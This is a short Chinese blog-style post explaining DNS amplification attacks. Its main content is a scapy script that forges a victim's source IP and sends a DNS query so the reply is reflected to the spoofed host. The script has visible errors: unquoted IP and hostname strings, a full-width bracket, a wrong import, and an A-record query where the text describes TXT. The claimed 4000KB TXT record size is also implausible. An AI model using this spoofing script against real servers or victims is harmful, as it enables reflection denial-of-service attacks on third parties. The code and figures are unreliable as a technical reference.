首先，DNS放大攻击，简单解释有两点：

1.伪造源IP为其他人的ip地址

2.被请求的记录，要求比较大，比如TXT格式，4000KB

在A机器上，向DNS发送查询那个TXT的记录，并伪造成别人的ip，即可理解为DNS放大攻击。

可以用python的scapy模拟：

from scapy import *

a = IP(dst=10.32.8.11,src=10.32.132.85)     #10.32.132.85即为伪造的源ip

b = UDP(dport=53)

c = DNS(id=1,qr=0,opcode=0,tc=0,rd=1,qdcount=1,ancount=0,nscount=0,arcount=0）

c.qd=DNSQR(qname=www.qq.com,qtype=1,qclass=1)

p = a/b/c

send(p)

模拟结束。

在10.32.132.85上抓dns的包，就会收到一条DNS响应，是10.32.8.11发来的。

---------------------------------------------------------------------------
低调的python小子